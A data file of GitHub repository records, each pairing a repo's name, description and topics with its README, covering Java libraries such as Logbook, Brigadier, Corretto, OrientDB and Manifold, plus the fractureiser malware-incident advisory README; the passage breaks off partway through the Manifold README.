### Spring Boot Starter Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults: - Servlet filter - Second Servlet filter for unauthorized requests (if Spring Security is detected) - Header-/Parameter-/Body-Filters - HTTP-/JSON-style formatter - Logging writer Instead of declaring a dependency to `logbook-core` declare one to the Spring Boot Starter: ```xml <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-spring-boot-starter</artifactId> <version>${logbook.version}</version> </dependency> ``` Every bean can be overridden and customized if needed, e.g. like this: ```java @Bean public BodyFilter bodyFilter() { return merge( defaultValue(), replaceJsonStringProperty(singleton("secret"), "XXX")); } ``` Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java) or the following table to see a list of possible integration points: | Type | Name | Default | |--------------------------|-----------------------|---------------------------------------------------------------------------| | `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter` | | `FilterRegistrationBean` | `logbookFilter` | Based on `LogbookFilter` | | `Logbook` | | Based on condition, filters, formatter and writer | | `Predicate<HttpRequest>` | `requestCondition` | No filter; is later combined with `logbook.exclude` and `logbook.exclude` | | `HeaderFilter` | | Based on `logbook.obfuscate.headers` | | `PathFilter` | | Based on `logbook.obfuscate.paths` | | `QueryFilter` | | Based on `logbook.obfuscate.parameters` | | `BodyFilter` | | `BodyFilters.defaultValue()`, see [filtering](#filtering) | | `RequestFilter` | | `RequestFilters.defaultValue()`, see [filtering](#filtering) | | `ResponseFilter` | | `ResponseFilters.defaultValue()`, see [filtering](#filtering) | | `Strategy` | | `DefaultStrategy` | | `AttributeExtractor` | | `NoOpAttributeExtractor` | | `Sink` | | `DefaultSink` | | `HttpLogFormatter` | | `JsonHttpLogFormatter` | | `HttpLogWriter` | | `DefaultHttpLogWriter` | Multiple filters are merged into one. #### Autoconfigured beans from `logbook-spring` Some classes from `logbook-spring` are included in the auto configuration. You can autowire `LogbookClientHttpRequestInterceptor` with code like: ```java private final RestTemplate restTemplate; MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor){ this.restTemplate = builder .additionalInterceptors(interceptor) .build(); } ``` #### Configuration The following tables show the available configuration (sorted alphabetically): | Configuration | Description | Default | |------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------| | `logbook.attribute-extractors` | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`. | `[]` | | `logbook.filter.enabled` | Enable the [`LogbookFilter`](#servlet) | `true` | | `logbook.filter.form-request-mode` | Determines how [form requests](#form-requests) are handled | `body` | | `logbook.filters.body.default-enabled` | Enables/disables default body filters that are collected by java.util.ServiceLoader | `true` | | `logbook.format.style` | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`) | `json` | | `logbook.httpclient.decompress-response` | Enables/disables additional decompression process for HttpClient with gzip encoded body (to logging purposes only). This means extra decompression and possible performance impact. | `false` (disabled) | | `logbook.minimum-status` | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`) | `400` | | `logbook.obfuscate.headers` | List of header names that need obfuscation | `[Authorization]` | | `logbook.obfuscate.json-body-fields` | List of JSON body fields to be obfuscated | `[]` | | `logbook.obfuscate.parameters` | List of parameter names that need obfuscation | `[access_token]` | | `logbook.obfuscate.paths` | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax. | `[]` | | `logbook.obfuscate.replacement` | A value to be used instead of an obfuscated one | `XXX` | | `logbook.predicate.include` | Include only certain paths and methods (if defined) | `[]` | | `logbook.predicate.exclude` | Exclude certain paths and methods (overrides `logbook.preidcates.include`) | `[]` | | `logbook.secure-filter.enabled` | Enable the [`SecureLogbookFilter`](#servlet) | `true` | | `logbook.strategy` | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`) | `default` | | `logbook.write.chunk-size` | Splits log lines into smaller chunks of size up-to `chunk-size`. | `0` (disabled) | | `logbook.write.max-body-size` | Truncates the body up to `max-body-size` and appends `...`. <br/> :warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled) | ##### Example configuration ```yaml logbook: predicate: include: - path: /api/** methods: - GET - POST - path: /actuator/** exclude: - path: /actuator/health - path: /api/admin/** methods: - POST filter.enabled: true secure-filter.enabled: true format.style: http strategy: body-only-if-status-at-least minimum-status: 400 obfuscate: headers: - Authorization - X-Secret parameters: - access_token - password write: chunk-size: 1000 attribute-extractors: - type: JwtFirstMatchingClaimExtractor claim-names: [ "sub", "subject" ] claim-key: Principal - type: JwtAllMatchingClaimsExtractor claim-names: [ "sub", "iat" ] ``` ### logstash-logback-encoder For basic Logback configuraton ``` <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender"> <encoder class="net.logstash.logback.encoder.LogstashEncoder"/> </appender> ``` configure Logbook with a `LogstashLogbackSink` ``` HttpLogFormatter formatter = new JsonHttpLogFormatter(); LogstashLogbackSink sink = new LogstashLogbackSink(formatter); ``` for outputs like ``` { "@timestamp" : "2019-03-08T09:37:46.239+01:00", "@version" : "1", "message" : "GET http://localhost/test?limit=1", "logger_name" : "org.zalando.logbook.Logbook", "thread_name" : "main", "level" : "TRACE", "level_value" : 5000, "http" : { // logbook request/response contents } } ``` #### Customizing default Logging Level You have the flexibility to customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance: ``` LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO); ``` ## Known Issues 1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details. 2. The Logbook Servlet Filter does **NOT** support `ERROR` dispatch. You're strongly encouraged to not use it to produce error responses. ## Getting Help with Logbook If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues). ## Getting Involved/Contributing To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For more details, check the [contribution guidelines](.github/CONTRIBUTING.md). ## Alternatives - [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html) - Client-side only - Apache HttpClient exclusive - Support for HTTP bodies - [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs) - Spring application only - Server-side only - Tomcat/Undertow/Jetty exclusive - **No** support for HTTP bodies - [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter) - Server-side only - Tomcat exclusive - **No** support for HTTP bodies - [logback-access](http://logback.qos.ch/access.html) - Server-side only - Any servlet container - Support for HTTP bodies ## Credits and References ![Creative Commons (Attribution-Share Alike 3.0 Unported](https://licensebuttons.net/l/by-sa/3.0/80x15.png) [*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg) by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a [Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/).
0
Mojang/brigadier
Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition.
null
# Brigadier [![Latest release](https://img.shields.io/github/release/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/releases/latest) [![License](https://img.shields.io/github/license/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/blob/master/LICENSE) Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition and now freely available for use elsewhere under the MIT license. # Installation Brigadier is available to Maven & Gradle via `libraries.minecraft.net`. Its group is `com.mojang`, and artifact name is `brigadier`. ## Gradle First include our repository: ```groovy maven { url "https://libraries.minecraft.net" } ``` And then use this library (change `(the latest version)` to the latest version!): ```groovy compile 'com.mojang:brigadier:(the latest version)' ``` ## Maven First include our repository: ```xml <repository> <id>minecraft-libraries</id> <name>Minecraft Libraries</name> <url>https://libraries.minecraft.net</url> </repository> ``` And then use this library (change `(the latest version)` to the latest version!): ```xml <dependency> <groupId>com.mojang</groupId> <artifactId>brigadier</artifactId> <version>(the latest version)</version> </dependency> ``` # Contributing Contributions are welcome! :D Most contributions will require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com. This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. # Usage At the heart of Brigadier, you need a `CommandDispatcher<S>`, where `<S>` is any custom object you choose to identify a "command source". A command dispatcher holds a "command tree", which is a series of `CommandNode`s that represent the various possible syntax options that form a valid command. ## Registering a new command Before we can start parsing and dispatching commands, we need to build up our command tree. Every registration is an append operation, so you can freely extend existing commands in a project without needing access to the source code that created them. Command registration also encourages the use of a builder pattern to keep code cruft to a minimum. A "command" is a fairly loose term, but typically it means an exit point of the command tree. Every node can have an `executes` function attached to it, which signifies that if the input stops here then this function will be called with the context so far. Consider the following example: ```java CommandDispatcher<CommandSourceStack> dispatcher = new CommandDispatcher<>(); dispatcher.register( literal("foo") .then( argument("bar", integer()) .executes(c -> { System.out.println("Bar is " + getInteger(c, "bar")); return 1; }) ) .executes(c -> { System.out.println("Called foo with no arguments"); return 1; }) ); ``` This snippet registers two "commands": `foo` and `foo <bar>`. It is also common to refer to the `<bar>` as a "subcommand" of `foo`, as it's a child node. At the start of the tree is a "root node", and it **must** have `LiteralCommandNode`s as children. Here, we register one command under the root: `literal("foo")`, which means "the user must type the literal string 'foo'". Under that is two extra definitions: a child node for possible further evaluation, or an `executes` block if the user input stops here. The child node works exactly the same way, but is no longer limited to literals. The other type of node that is now allowed is an `ArgumentCommandNode`, which takes in a name and an argument type. Arguments can be anything, and you are encouraged to build your own for seamless integration into your own product. There are some standard arguments included in brigadier, such as `IntegerArgumentType`. Argument types will be asked to parse input as much as they can, and then store the "result" of that argument however they see fit or throw a relevant error if they can't parse. For example, an integer argument would parse "123" and store it as `123` (`int`), but throw an error if the input were `onetwothree`. When a command is actually run, it can access these arguments in the context provided to the registered function. ## Parsing user input So, we've registered some commands and now we're ready to take in user input. If you're in a rush, you can just call `dispatcher.execute("foo 123", source)` and call it a day. The result of `execute` is an integer that was returned from an evaluated command. The meaning of this integer depends on the command, and will typically not be useful to programmers. The `source` is an object of `<S>`, your own custom class to track users/players/etc. It will be provided to the command so that it has some context on what's happening. If the command failed or could not parse, some form of `CommandSyntaxException` will be thrown. It is also possible for a `RuntimeException` to be bubbled up, if not properly handled in a command. If you wish to have more control over the parsing & executing of commands, or wish to cache the parse results so you can execute it multiple times, you can split it up into two steps: ```java final ParseResults<S> parse = dispatcher.parse("foo 123", source); final int result = execute(parse); ``` This is highly recommended as the parse step is the most expensive, and may be easily cached depending on your application. You can also use this to do further introspection on a command, before (or without) actually running it. ## Inspecting a command If you `parse` some input, you can find out what it will perform (if anything) and provide hints to the user safely and immediately. The parse will never fail, and the `ParseResults<S>` it returns will contain a *possible* context that a command may be called with (and from that, you can inspect which nodes the user entered, complete with start/end positions in the input string). It also contains a map of parse exceptions for each command node it encountered. If it couldn't build a valid context, then the reason why is inside this exception map. ## Displaying usage info There are two forms of "usage strings" provided by this library, both require a target node. `getAllUsage(node, source, restricted)` will return a list of all possible commands (executable end-points) under the target node and their human readable path. If `restricted`, it will ignore commands that `source` does not have access to. This will look like [`foo`, `foo <bar>`]. `getSmartUsage(node, source)` will return a map of the child nodes to their "smart usage" human readable path. This tries to squash future-nodes together and show optional & typed information, and can look like `foo (<bar>)`. [![GitHub forks](https://img.shields.io/github/forks/Mojang/brigadier.svg?style=social&label=Fork)](https://github.com/Mojang/brigadier/fork) [![GitHub stars](https://img.shields.io/github/stars/Mojang/brigadier.svg?style=social&label=Stars)](https://github.com/Mojang/brigadier/stargazers)
0
spring-cloud/spring-cloud-netflix
Integration with Netflix OSS components
cloud-native feign java microservices netflix-eureka netflix-hystrix netflix-zuul netflixoss ribbon spring spring-boot spring-cloud spring-cloud-core
null
0
warmuuh/milkman
An Extensible Request/Response Workbench
grpc hacktoberfest http milkman-plugins rest testing
null
0
corretto/corretto-8
Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8
null
## Corretto 8 Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS. The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases). Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto). ### Licenses and Trademarks Please read these files: "LICENSE", "THIRD_PARTY_README", "ASSEMBLY_EXCEPTION", "TRADEMARKS.md". ### Branches _develop_ : The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted. _master_ : The stable branch. Starting point for the release process. It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing. _ga-release_ : The source code of the GA release on 01/31/2019. _preview-release_ : The source code of the preview release on 11/14/2018. _release-8.XXX.YY.Z_ : The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant. ### OpenJDK Readme ``` Welcome to the JDK! =================== For build instructions please see https://openjdk.java.net/groups/build/doc/building.html, or either of these files: - doc/building.html (html version) - doc/building.md (markdown version) See https://openjdk.java.net for more information about the OpenJDK Community and the JDK. ```
0
mvel/mvel
MVEL (MVFLEX Expression Language)
null
# MVEL MVFLEX Expression Language (MVEL) is a hybrid dynamic/statically typed, embeddable Expression Language and runtime for the Java Platform. ## Document http://mvel.documentnode.com/ ## How to build ``` git clone https://github.com/mvel/mvel.git cd mvel mvn clean install ```
0
orientechnologies/orientdb
OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.
database dbms document-database fast graph-database graph-store multi-master multi-model-dbms nosql orientdb performance sql
## OrientDB [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb) ------ ## What is OrientDB? **OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with the support of Native Graphs, Documents, Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast. No expensive run-time JOINs, connections are managed as persistent pointers between records. You can traverse thousands of records in no time. Supports schema-less, schema-full and schema-mixed modes. Has a strong security profiling system based on user, roles and predicate security and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst the query languages. Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world. [Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) | [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) | [Dev Updates](https://fosstodon.org/@orientdb) | [Community Chat](https://matrix.to/#/#orientdb-community:matrix.org) . ## Is OrientDB a Relational DBMS? No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and [SQL](https://orientdb.org/docs/3.2.x/sql/) as query language. In this way it's easy to start using it without having to learn too much new stuff. ## Easy to install and use Yes. OrientDB is totally written in [Java](http://en.wikipedia.org/wiki/Java_%28programming_language%29) and can run on any platform without configuration and installation. Do you develop with a language different than Java? No problem, look at the [Programming Language Binding](http://orientdb.org/docs/3.1.x/apis-and-drivers/). ## Main References - [Documentation Version < 3.2.x](http://orientdb.org/docs/3.1.x/) - For any questions visit the [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) [Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/). -------- ## Contributing For the guide to contributing to OrientDB checkout the [CONTRIBUTING.MD](https://github.com/orientechnologies/orientdb/blob/develop/CONTRIBUTING.md) All the contribution are considered licensed under Apache-2 license if not stated otherwise. -------- ## Licensing OrientDB is licensed by OrientDB LTD under the Apache 2 license. OrientDB relies on the following 3rd party libraries, which are compatible with the Apache license: - Javamail: CDDL license (http://www.oracle.com/technetwork/java/faq-135477.html) - java persistence 2.0: CDDL license - JNA: Apache 2 (https://github.com/twall/jna/blob/master/LICENSE) - Hibernate JPA 2.0 API: Eclipse Distribution License 1.0 - ASM: OW2 References: - Apache 2 license (Apache2): http://www.apache.org/licenses/LICENSE-2.0.html - Common Development and Distribution License (CDDL-1.0): http://opensource.org/licenses/CDDL-1.0 - Eclipse Distribution License (EDL-1.0): http://www.eclipse.org/org/documents/edl-v10.php (http://www.eclipse.org/org/documents/edl-v10.php) ### Sponsors [![](http://s1.softpedia-static.com/_img/sp100free.png?1)](http://www.softpedia.com/get/Internet/Servers/Database-Utils/OrientDB.shtml#status) -------- ### Reference Recent architecture re-factoring and improvements are described in our [BICOD 2021](http://ceur-ws.org/Vol-3163/BICOD21_paper_3.pdf) paper: ``` @inproceedings{DBLP:conf/bncod/0001DLT21, author = {Daniel Ritter and Luigi Dell'Aquila and Andrii Lomakin and Emanuele Tagliaferri}, title = {OrientDB: {A} NoSQL, Open Source {MMDMS}}, booktitle = {Proceedings of the The British International Conference on Databases 2021, London, United Kingdom, March 28, 2022}, series = {{CEUR} Workshop Proceedings}, volume = {3163}, pages = {10--19}, publisher = {CEUR-WS.org}, year = {2021} } ```
0
zhoutaoo/SpringCloud
基于SpringCloud2.1的微服务开发脚手架,整合了spring-security-oauth2、nacos、feign、sentinel、springcloud-gateway等。服务治理方面引入elasticsearch、skywalking、springboot-admin、zipkin等,让项目开发快速进入业务开发,而不需过多时间花费在架构搭建上。持续更新中
elasticsearch eureka feign-client hystrix jetcache moss nacos oauth2 sentinel skywalking spring-cloud-gateway spring-security springboot springboot-admin springboot-springcloud springcloud zipkin zipkin-sleuth
null
0
fractureiser-investigation/fractureiser
Information about the fractureiser malware
null
<p align="center"> <img src="docs/media/logo.svg" alt="fractureiser logo" height="240"> </p> **Translations to other languages:** *These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.* * [简体中文版本见此](./lang/zh-CN/) * [Polska wersja](./lang/pl-PL/) * [Читать на русском языке](./lang/ru-RU/) * [한국어는 이곳으로](./lang/ko-KR/) * Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls) ## What? `fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux. If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe. We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files. ## Current Investigation Status The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months. A third C&C was never stood up to our knowledge. A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant. ## Follow-Up Meeting On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale. See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event. ## BlanketCon Panel emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI). ## What YOU need to know ### [Modded Players CLICK HERE](docs/users.md) If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ. Anyone who wishes to dig deeper may also look at * [Event Timeline](docs/timeline.md) * [Technical Breakdown](docs/tech.md) ### I have never used any Minecraft mods You are not infected. ## Additional Info We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`. If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact. The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.*** **Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing. --- \- the [fractureiser Mitigation Team](docs/credits.md)
0
manifold-systems/manifold
Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.
android-studio delegation duck-typing extension-methods graphql graphql-java intellij java java-development java-sql java-tooling js-java-interoperability json manifold metaprogramming preprocessor reflection-framework structural-typing template-engine type-providers
<br> <img width="500" height="121" align="top" src="./docs/images/manifold_green.png"> ![latest](https://img.shields.io/badge/latest-v2024.1.12-royalblue.svg) [![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) [![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold) --- ## What is Manifold? Manifold is a Java compiler plugin. It supplements Java with: * Direct, _type-safe_ access to: * [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_ * [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) * [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), [YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), [XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml) * [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv) * [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js) * etc. * [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) * [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) * [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) * [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) * [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) * [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) * [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) * [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) * ...and more All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**. Manifold consists of a set of modules, one for each feature. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them. ># _**What's New...**_ > >[<img width="40%" height="40%" align="top" src="./docs/images/manifoldsql.png">](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) > >### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) > Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code. >- Query types are instantly available as you type native SQL of any complexity in your Java code >- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more >- No ORM, No DSL, No wiring, and No code generation build steps > <br><br> > [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) ## Who is using Manifold? Sampling of companies using Manifold: <img width="80%" height="80%" src="./docs/images/companies.png"> ## What can you do with Manifold? ### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold) Use the framework to gain direct, type-safe access to *any* type of resource, such as [**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql), [**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), [**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql), [**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml), [**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), [**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js). Remove the code gen step in your build process. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/graphql.mp4) [**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql) Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java. ```java Language english = "[.sql/]select * from Language where name = 'English'".fetchOne(); Film film = Film.builder("My Movie", english) .withDescription("Nice movie") .withReleaseYear(2023) .build(); MyDatabase.commit(); ``` [**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) Use types defined in .graphql files *directly*, no code gen steps! Make GraphQL changes and immediately use them with code completion. ```java var query = MovieQuery.builder(Action).build(); var result = query.request("http://com.example/graphql").post(); var actionMovies = result.getMovies(); for (var movie : actionMovies) { out.println( "Title: " + movie.getTitle() + "\n" + "Genre: " + movie.getGenre() + "\n" + "Year: " + movie.getReleaseDate().getYear() + "\n"); } ``` [**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json) Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code. ```java // From User.json User user = User.builder("myid", "mypassword", "Scott") .withGender(male) .withDob(LocalDate.of(1987, 6, 15)) .build(); User.request("http://api.example.com/users").postOne(user); ``` ### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code. [&nbsp;**▶**&nbsp;Check&nbsp;it&nbsp;out!](http://manifold.systems/images/ExtensionMethod.mp4) ```java String greeting = "hello"; greeting.myMethod(); // Add your own methods to String! ``` ### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation. > ```java > class MyClass implements MyInterface { > @link MyInterface myInterface; // transfers calls on MyInterface to myInterface > > public MyClass(MyInterface myInterface) { > this.myInterface = myInterface; // dynamically configure behavior > } > > // No need to implement MyInterface here, but you can override myInterface as needed > } > ``` ### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) Eliminate boilerplate getter/setter code, improve your overall dev experience with properties. ```java public interface Book { @var String title; // no more boilerplate code! } // refer to it directly by name book.title = "Daisy"; // calls setter String name = book.title; // calls getter book.title += " chain"; // calls getter & setter ``` Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from compiled classes your project uses. Reduce property use from this: ```java Actor person = result.getMovie().getLeadingRole().getActor(); Likes likes = person.getLikes(); likes.setCount(likes.getCount() + 1); ``` to this: ```java result.movie.leadingRole.actor.likes.count++; ``` ### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators. ```java // BigDecimal expressions if (bigDec1 > bigDec2) { BigDecimal result = bigDec1 + bigDec2; ... } // Implement operators for any type MyType value = myType1 + myType2; ``` ### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) Tuple expressions provide concise syntax to group named data items in a lightweight structure. ```java var t = (name: "Bob", age: "35"); System.out.println("Name: " + t.name + " Age: " + t.age); var t = (person.name, person.age); System.out.println("Name: " + t.name + " Age: " + t.age); ``` You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method. ### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be applied to a wide range of applications. ```java import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc ... Length distance = 100 mph * 3 hr; Force f = 5.2 kg m/s/s; // same as 5.2 N Mass infant = 9 lb + 8.71 oz; ``` ### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges) Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions). Simply import the *RangeFun* constants to create ranges. ```java // imports the `to`, `step`, and other "binding" constants import static manifold.collections.api.range.RangeFun.*; ... for (int i: 1 to 5) { out.println(i); } for (Mass m: 0kg to 10kg step 22r unit g) { out.println(m); } ``` ### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) framework to type-safely 